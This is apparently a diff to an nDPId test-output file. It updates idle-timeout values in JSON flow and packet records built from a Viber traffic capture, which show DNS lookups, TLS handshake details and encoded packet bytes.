+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1527155638524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155638524,"pkt":"MAdNo1+nAA6OMNv9CABFAAA0M+hAACYGLr00AP1lwKgAERCUgbhNDRRo2B+UZYAQAIxrZwAAAQEICveUYGsAIWBC"} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1527155639005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639005,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8HWBAAEARm+DAqAARwKgAD4nTADUAKI8By5wBAAABAAAAAAAAA2FwcAZhZGp1c3QDY29tAAABAAE="} 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639005,"flow_last_seen":1527155639005,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1527155639005,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"},"dns": {"query":"app.adjust.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -19,42 +19,42 @@ 00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639234,"flow_last_seen":1527155639234,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155639234,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1527155639237,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1527155639237,"pkt":"MAdNo1+nAA6OMNv9CABFAAFnW5VAAEARXIDAqAAPwKgAEQA19ZgBU\/qk\/WOBgAABAAkABAABBG1hcGkJYXBwdGltaXplA2NvbQAAAQABwAwABQABAAAKmgACwBHAEQABAAEAAAA7AAQ2RabiwBEAAQABAAAAOwAENrtbtsARAAEAAQAAADsABCLf10HAEQABAAEAAAA7AAQjoIExwBEAAQABAAAAOwAEI6WM3sARAAEAAQAAADsABCOitm\/AEQABAAEAAAA7AAQ2RVffwBEAAQABAAAAOwAENrpW+MARAAIAAQAAA2AAGQducy0xODgzCWF3c2Rucy00MwJjbwJ1awDAEQACAAEAAANgABcHbnMtMTEyOQlhd3NkbnMtMTMDb3JnAMARAAIAAQAAA2AAFgZucy02ODUJYXdzZG5zLTIxA25ldADAEQACAAEAAANgABMGbnMtNDczCWF3c2Rucy01OcAbwSgAAQABAAADYAAEzfvB2Q=="} 
00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1527155639237,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.166.226"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639240,"flow_last_seen":1527155639240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155639240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1527155639240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8C6FAAEAGkTrAqAARNkWm4pB6Abv8W2quAAAAAKAC\/\/9PrwAAAgQFtAQCCAoAIWEPAAAAAAEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1527155639414,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639414,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHpPMSQJ\/Ftqr6ASaN+BOQAAAgQFtAQCCApMsKWZACFhDwEDAwg="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1527155639417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155639417,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0C6JAAEAGkUHAqAARNkWm4pB6Abv8W2qvTzEkCoAQAq0WDQAAAQEICgAhYTtMsKWZ"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, 
ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155640085,"flow_last_seen":1527155640085,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155640085,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1527155640085,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640085,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8sZJAAEAG60jAqAARNkWm4pB8Abt0c9BwAAAAAKAC\/\/9xAAAAAgQFtAQCCAoAIWHiAAAAAAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1527155640261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640261,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHz0FjHkdHPQcaASaN\/u9gAAAgQFtAQCCApMsKZsACFh4gEDAwg="} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1527155640264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155640264,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0sZNAAEAG60\/AqAARNkWm4pB8Abt0c9Bx9BYx5YAQAq2DyQAAAQEICgAhYg9MsKZs"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639240,"flow_last_seen":1527155639240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155639240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1527155639240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8C6FAAEAGkTrAqAARNkWm4pB6Abv8W2quAAAAAKAC\/\/9PrwAAAgQFtAQCCAoAIWEPAAAAAAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1527155639414,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639414,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHpPMSQJ\/Ftqr6ASaN+BOQAAAgQFtAQCCApMsKWZACFhDwEDAwg="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1527155639417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155639417,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0C6JAAEAGkUHAqAARNkWm4pB6Abv8W2qvTzEkCoAQAq0WDQAAAQEICgAhYTtMsKWZ"} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155640085,"flow_last_seen":1527155640085,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155640085,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1527155640085,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640085,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8sZJAAEAG60jAqAARNkWm4pB8Abt0c9BwAAAAAKAC\/\/9xAAAAAgQFtAQCCAoAIWHiAAAAAAEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1527155640261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640261,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHz0FjHkdHPQcaASaN\/u9gAAAgQFtAQCCApMsKZsACFh4gEDAwg="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1527155640264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155640264,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0sZNAAEAG60\/AqAARNkWm4pB8Abt0c9Bx9BYx5YAQAq2DyQAAAQEICgAhYg9MsKZs"} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1527155641574,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1527155641574,"pkt":"AA6OMNv9MAdNo1+nCABFAABBH3ZAAEARmcXAqAARwKgAD5IqADUALZxVyU0BAAABAAAAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAQ=="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1527155641691,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1527155641691,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXEZAAEARXIvAqAAPwKgAEQA1kioAlzNhyU2BgAABAAUAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAcAMAAUAAQAACsAAHg1kbzJneTJrd2FrOWsyCmNsb3VkZnJvbnQDbmV0AMAxAAEAAQAAADsABDbmXWDAMQABAAEAAAA7AAQ25l2mwDEAAQABAAAAOwAENuZdIsAxAAEAAQAAADsABDbmXaA="} 00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155641691,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.96"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641697,"flow_last_seen":1527155641697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641697,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1527155641697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641697,"pkt":"AA6OMNv9MAdNo1+nCABFAAA825FAAEAGCivAqAARNuZdYOCwAbu7GrjkAAAAAKAC\/\/84\/wAAAgQFtAQCCAoAIWN1AAAAAAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1527155641714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641714,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMbw25l1gwKgAEQG74LAWDyy+uxq45aAScSCWXAAAAgQFtAQCCAp+anA4ACFjdQEDAwg="} 